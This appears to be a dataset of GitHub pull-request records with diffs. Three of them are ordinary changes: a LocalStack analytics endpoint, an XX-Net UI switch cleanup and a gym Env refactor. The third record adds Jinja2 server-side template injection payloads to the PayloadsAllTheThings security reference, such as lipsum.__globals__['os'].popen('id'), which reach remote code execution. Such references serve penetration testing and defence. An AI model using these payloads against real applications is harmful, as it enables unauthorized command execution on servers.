set analytics api version to v1 | diff --git a/localstack/constants.py b/localstack/constants.py

index 3279329f20adc..a2a80eb181d66 100644

--- a/localstack/constants.py

+++ b/localstack/constants.py

@@ -143,7 +143,7 @@

# API endpoint for analytics events

API_ENDPOINT = os.environ.get("API_ENDPOINT") or "https://api.localstack.cloud/v1"

# new analytics API endpoint

-ANALYTICS_API = os.environ.get("ANALYTICS_API") or "https://analytics.localstack.cloud/v0"

+ANALYTICS_API = os.environ.get("ANALYTICS_API") or "https://analytics.localstack.cloud/v1"

# environment variable to indicates that this process is running the Web UI

LOCALSTACK_WEB_PROCESS = "LOCALSTACK_WEB_PROCESS"

| this PR updates the analytics API to v1 which was deployed and tested today | https://api.github.com/repos/localstack/localstack/pulls/6431 | 2022-07-11T15:26:18Z | 2022-07-11T17:09:48Z | 2022-07-11T17:09:48Z | 2022-07-11T17:10:03Z | 176 | localstack/localstack | 28,853 |

Improve switch control | diff --git a/gae_proxy/web_ui/config.html b/gae_proxy/web_ui/config.html

index 704861d5f0..6b6174c350 100644

--- a/gae_proxy/web_ui/config.html

+++ b/gae_proxy/web_ui/config.html

@@ -158,16 +158,11 @@

}

if ( result['host_appengine_mode'] == 'gae' ) {

- $('#deploy-via-gae').parent().removeClass('switch-off');

- $('#deploy-via-gae').parent().addClass('switch-on');

- $('#deploy-via-gae').prop('checked', true);

+ $('#deploy-via-gae').bootstrapSwitch('setState', true);

}

if ( typeof(result['proxy_enable']) != 'undefined' && result['proxy_enable'] != 0 ) {

- $('#enable-proxy').parent().removeClass('switch-off');

- $('#enable-proxy').parent().addClass('switch-on');

-

- $('#enable-proxy').prop('checked', true);

+ $('#enable-proxy').bootstrapSwitch('setState', true)

$('#proxy-options').slideDown();

}

$('#proxy-type').val(result['proxy_type']);

@@ -176,9 +171,7 @@

$('#proxy-username').val(result['proxy_user']);

$('#proxy-password').val(result['proxy_passwd']);

if ( result['use_ipv6'] == 1 ) {

- $('#use-ipv6').parent().removeClass('switch-off');

- $('#use-ipv6').parent().addClass('switch-on');

- $('#use-ipv6').prop('checked', true);

+ $('#use-ipv6').bootstrapSwitch('setState', true);

}

},

error: function(){

diff --git a/gae_proxy/web_ui/deploy.html b/gae_proxy/web_ui/deploy.html

index 22de14bc23..c199112360 100644

--- a/gae_proxy/web_ui/deploy.html

+++ b/gae_proxy/web_ui/deploy.html

@@ -46,21 +46,6 @@ <h2>{{ _( "Deploy XX-Net onto GAE" ) }}</h2>

});

});

</script>

-<script type="text/javascript">

- $('label[for=advanced-options]').click(function() {

- var isAdvancedOptionsShown = $('#advanced-options').is(':visible');

-

- if ( !isAdvancedOptionsShown ) {

- $('i.icon', this).removeClass('icon-chevron-right');

- $('i.icon', this).addClass('icon-chevron-down');

- $('#advanced-options').slideDown();

- } else {

- $('i.icon', this).removeClass('icon-chevron-down');

- $('i.icon', this).addClass('icon-chevron-right');

- $('#advanced-options').slideUp();

- }

- });

-</script>

<script type="text/javascript">

$('#log').scroll(function() {

var preservedHeight = $('#log').height() + 10,

diff --git a/gae_proxy/web_ui/scan_setting.html b/gae_proxy/web_ui/scan_setting.html

index 2fd4c4bc98..ab238cfa23 100644

--- a/gae_proxy/web_ui/scan_setting.html

+++ b/gae_proxy/web_ui/scan_setting.html

@@ -75,10 +75,7 @@

dataType: 'JSON',

success: function(result) {

if ( result['auto_adjust_scan_ip_thread_num'] != 0 ) {

- $( "#auto-adjust-scan-ip-thread-num").parent().removeClass('switch-off');

- $( "#auto-adjust-scan-ip-thread-num").parent().addClass('switch-on');

-

- $( "#auto-adjust-scan-ip-thread-num").prop('checked', true);

+ $( "#auto-adjust-scan-ip-thread-num").bootstrapSwitch('setState', true);

}

$('#scan-ip-thread-num').val(result['scan_ip_thread_num']);

},

diff --git a/gae_proxy/web_ui/status.html b/gae_proxy/web_ui/status.html

index 2483bca35a..44f15aeaaf 100644

--- a/gae_proxy/web_ui/status.html

+++ b/gae_proxy/web_ui/status.html

@@ -544,10 +544,11 @@ <h3>{{ _( "Diagnostic Info" ) }}</h3>

dataType: 'JSON',

success: function(result) {

if ( result['show_detail'] != 0 ) {

- $( "#show-detail").parent().removeClass('switch-off');

- $( "#show-detail").parent().addClass('switch-on');

- $( "#show-detail").prop('checked', true);

+ $( "#show-detail").bootstrapSwitch('setState', true);

$( "#details" ).slideDown();

+ } else {

+ $( "#show-detail").bootstrapSwitch('setState', false);

+ $( "#details" ).slideUp();

}

}

});

diff --git a/launcher/web_ui/config.html b/launcher/web_ui/config.html

index c8b7ee15c4..02b961205d 100644

--- a/launcher/web_ui/config.html

+++ b/launcher/web_ui/config.html

@@ -148,47 +148,25 @@

dataType: 'JSON',

success: function(result) {

if ( result['auto_start'] != 0 ) {

- $( "#auto-start").parent().removeClass('switch-off');

- $( "#auto-start").parent().addClass('switch-on');

-

- $( "#auto-start").prop('checked', true);

+ $( "#auto-start").bootstrapSwitch('setState', true);

}

if ( result['popup_webui'] != 0 ) {

- $( "#popup-webui").parent().removeClass('switch-off');

- $( "#popup-webui").parent().addClass('switch-on');

-

- $( "#popup-webui").prop('checked', true);

+ $( "#popup-webui").bootstrapSwitch('setState', true);

}

if ( result['allow_remote_connect'] != 0 ) {

- $( "#allow-remote-connect").parent().removeClass('switch-off');

- $( "#allow-remote-connect").parent().addClass('switch-on');

-

- $( "#allow-remote-connect").prop('checked', true);

+ $( "#allow-remote-connect").bootstrapSwitch('setState', true);

}

if ( result['show_systray'] != 0 ) {

- $( "#show-systray").parent().removeClass('switch-off');

- $( "#show-systray").parent().addClass('switch-on');

-

- $( "#show-systray").prop('checked', true);

+ $( "#show-systray").bootstrapSwitch('setState', true);

}

if ( result['gae_proxy_enable'] != 0 ) {

- $( "#gae_proxy-enable").parent().removeClass('switch-off');

- $( "#gae_proxy-enable").parent().addClass('switch-on');

-

-

- $( "#gae_proxy-enable").prop('checked', true);

+ $( "#gae_proxy-enable").bootstrapSwitch('setState', true);

}

if ( result['php_enable'] != 0 ) {

- $( "#php-enable").parent().removeClass('switch-off');

- $( "#php-enable").parent().addClass('switch-on');

-

- $( "#php-enable").prop('checked', true);

+ $( "#php-enable").bootstrapSwitch('setState', true);

}

if ( result['x_tunnel_enable'] != 0 ) {

- $( "#x-tunnel-enable").parent().removeClass('switch-off');

- $( "#x-tunnel-enable").parent().addClass('switch-on');

-

- $( "#x-tunnel-enable").prop('checked', true);

+ $( "#x-tunnel-enable").bootstrapSwitch('setState', true);

}

$( "#language").val(result['language']);

$( "#check-update").val(result['check_update']);

diff --git a/php_proxy/web_ui/config.html b/php_proxy/web_ui/config.html

index 6fb34ad0f5..bde5d2103c 100644

--- a/php_proxy/web_ui/config.html

+++ b/php_proxy/web_ui/config.html

@@ -98,10 +98,7 @@

$('#php-password').val(result['php_password']);

if ( typeof(result['proxy_enable']) != 'undefined' && result['proxy_enable'] != 0 ) {

- $('#enable-front-proxy').parent().removeClass('switch-off');

- $('#enable-front-proxy').parent().addClass('switch-on');

-

- $('#enable-front-proxy').prop('checked', true);

+ $('#enable-front-proxy').bootstrapSwitch('setState', true);

$('#front-proxy-options').slideDown();

}

$('#proxy-host').val(result['proxy_host']);

| https://api.github.com/repos/XX-net/XX-Net/pulls/2526 | 2016-03-28T08:27:44Z | 2016-03-28T08:58:19Z | 2016-03-28T08:58:19Z | 2016-03-28T08:58:19Z | 1,854 | XX-net/XX-Net | 17,211 |

|

Adding Jinja2 RCE through lipsum in Templates | diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md

index 5c9fe14cde..3c0324e1b0 100644

--- a/Server Side Template Injection/README.md

+++ b/Server Side Template Injection/README.md

@@ -563,7 +563,7 @@ But when `__builtins__` is filtered, the following payloads are context-free, an

{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}

```

-We can use these shorter payloads (this is the shorter payloads known yet):

+We can use these shorter payloads:

```python

{{ cycler.__init__.__globals__.os.popen('id').read() }}

@@ -573,6 +573,14 @@ We can use these shorter payloads (this is the shorter payloads known yet):

Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/

+With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:

+

+```python

+{{ lipsum.__globals__["os"].popen('id').read() }}

+```

+

+Source: https://twitter.com/podalirius_/status/1655970628648697860

+

#### Exploit the SSTI by calling subprocess.Popen

:warning: the number 396 will vary depending of the application.

| Source: https://twitter.com/podalirius_/status/1655970628648697860 | https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/642 | 2023-05-09T16:34:44Z | 2023-05-09T16:58:58Z | 2023-05-09T16:58:58Z | 2023-05-09T16:58:58Z | 359 | swisskyrepo/PayloadsAllTheThings | 8,343 |



Avoid metaclass conflicts when inheriting from `gym.Env` | diff --git a/gym/core.py b/gym/core.py

index e06398e7f51..7a1b79ebe43 100644

--- a/gym/core.py

+++ b/gym/core.py

@@ -31,55 +31,36 @@

RenderFrame = TypeVar("RenderFrame")

-class _EnvDecorator(type): # TODO: remove with gym 1.0

- """Metaclass used for adding deprecation warning to the mode kwarg in the render method."""

-

- def __new__(cls, name, bases, attr):

- if "render" in attr.keys():

- attr["render"] = _EnvDecorator._deprecate_mode(attr["render"])

-

- return super().__new__(cls, name, bases, attr)

-

- @staticmethod

- def _deprecate_mode(render_func): # type: ignore

- render_return = Optional[Union[RenderFrame, List[RenderFrame]]]

-

- def render(

- self: object, *args: Tuple[Any], **kwargs: Dict[str, Any]

- ) -> render_return:

- if "mode" in kwargs.keys() or len(args) > 0:

- deprecation(

- "The argument mode in render method is deprecated; "

- "use render_mode during environment initialization instead.\n"

- "See here for more information: https://www.gymlibrary.ml/content/api/"

- )

- elif self.spec is not None and "render_mode" not in self.spec.kwargs.keys(): # type: ignore

- deprecation(

- "You are calling render method, "

- "but you didn't specified the argument render_mode at environment initialization. "

- "To maintain backward compatibility, the environment will render in human mode.\n"

- "If you want to render in human mode, initialize the environment in this way: "

- "gym.make('EnvName', render_mode='human') and don't call the render method.\n"

- "See here for more information: https://www.gymlibrary.ml/content/api/"

- )

-

- return render_func(self, *args, **kwargs)

-

- return render

-

-

-decorator = _EnvDecorator

-if sys.version_info[0:2] == (3, 6):

- # needed for https://github.com/python/typing/issues/449

- from typing import GenericMeta

+# TODO: remove with gym 1.0

+def _deprecate_mode(render_func): # type: ignore

+ """Wrapper used for adding deprecation warning to the mode kwarg in the render method."""

+ render_return = Optional[Union[RenderFrame, List[RenderFrame]]]

- class _GenericEnvDecorator(GenericMeta, _EnvDecorator):

- pass

+ def render(

+ self: object, *args: Tuple[Any], **kwargs: Dict[str, Any]

+ ) -> render_return:

+ if "mode" in kwargs.keys() or len(args) > 0:

+ deprecation(

+ "The argument mode in render method is deprecated; "

+ "use render_mode during environment initialization instead.\n"

+ "See here for more information: https://www.gymlibrary.ml/content/api/"

+ )

+ elif self.spec is not None and "render_mode" not in self.spec.kwargs.keys(): # type: ignore

+ deprecation(

+ "You are calling render method, "

+ "but you didn't specified the argument render_mode at environment initialization. "

+ "To maintain backward compatibility, the environment will render in human mode.\n"

+ "If you want to render in human mode, initialize the environment in this way: "

+ "gym.make('EnvName', render_mode='human') and don't call the render method.\n"

+ "See here for more information: https://www.gymlibrary.ml/content/api/"

+ )

- decorator = _GenericEnvDecorator

+ return render_func(self, *args, **kwargs)

+ return render

-class Env(Generic[ObsType, ActType], metaclass=decorator):

+

+class Env(Generic[ObsType, ActType]):

r"""The main OpenAI Gym class.

It encapsulates an environment with arbitrary behind-the-scenes dynamics.

@@ -106,6 +87,12 @@ class Env(Generic[ObsType, ActType], metaclass=decorator):

Note: a default reward range set to :math:`(-\infty,+\infty)` already exists. Set it if you want a narrower range.

"""

+ def __init_subclass__(cls) -> None:

+ """Hook used for wrapping render method."""

+ super().__init_subclass__()

+ if "render" in vars(cls):

+ cls.render = _deprecate_mode(vars(cls)["render"])

+

# Set this in SOME subclasses

metadata = {"render_modes": []}